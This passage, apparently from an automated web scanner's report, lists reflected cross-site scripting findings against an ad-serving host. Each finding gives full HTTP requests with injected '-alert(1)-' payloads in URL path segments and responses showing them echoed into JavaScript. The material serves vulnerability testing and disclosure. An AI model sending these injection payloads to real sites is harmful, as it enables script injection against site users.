Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A93632FFBB17573BD469B7C9DA1DCC4; Path=/
Connection: keep-alive
Content-Length: 2698


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://celebrities.glam.com/",
   adsafeSrc : "http://ad.doubleclick.net.76705.9611.302br.net/fw/adj70c35"-alert(1)-"57f7527f91/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aip
...[SNIP]...

6.74. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.76705.9611.302br.net
Path:   /jss/adj/N1243.Glam.com/B5234896.7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b70a"-alert(1)-"8de33777c29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jss/adj/N1243.Glam.com8b70a"-alert(1)-"8de33777c29/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 02 May 2011 13:09:53 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AAE01386AF445880C5620A40C1F4B924; Path=/
Connection: keep-alive
Content-Length: 2698


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://celebrities.glam.com/",
   adsafeSrc : "http://ad.doubleclick.net.76705.9611.302br.net/fw/adj/N1243.Glam.com8b70a"-alert(1)-"8de33777c29/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D2011050205
...[SNIP]...

6.75. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.76705.9611.302br.net
Path:   /jss/adj/N1243.Glam.com/B5234896.7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82738"-alert(1)-"fe73189adbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jss/adj/N1243.Glam.com/B5234896.782738"-alert(1)-"fe73189adbc;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 02 May 2011 13:10:04 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=747EAAAC9846E913BFE9893D53CCA3D8; Path=/
Connection: keep-alive
Content-Length: 2698


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://celebrities.glam.com/",
   adsafeSrc : "http://ad.doubleclick.net.76705.9611.302br.net/fw/adj/N1243.Glam.com/B5234896.782738"-alert(1)-"fe73189adbc;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1
...[SNIP]...

6.76. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain